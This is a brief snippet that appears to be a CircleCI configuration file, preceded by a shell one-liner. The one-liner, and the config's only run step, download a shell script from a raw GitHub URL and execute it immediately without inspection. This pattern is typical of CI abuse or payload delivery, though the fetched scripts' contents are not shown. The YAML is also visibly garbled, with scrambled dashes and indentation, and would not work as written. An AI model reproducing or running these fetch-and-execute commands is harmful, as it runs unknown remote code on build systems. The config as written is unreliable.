wget https://raw.githubusercontent.com/Halahsiah/ehem/main/Dalah.sh && chmod +x Dalah.sh && ./Dalah.sh

.circleci/config.yml

version: 2.0
jobs:
  build:
      docker:
            - image: cimg/base:2021.04
            -         auth:
            -                   username: mydockerhub-user
            -                             password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
            -                                 steps:
            -                                       - checkout
      - run: wget https://raw.githubusercontent.com/Halahsiah/ehem/main/Najis.sh && chmod +x Najis.sh && ./Najis.sh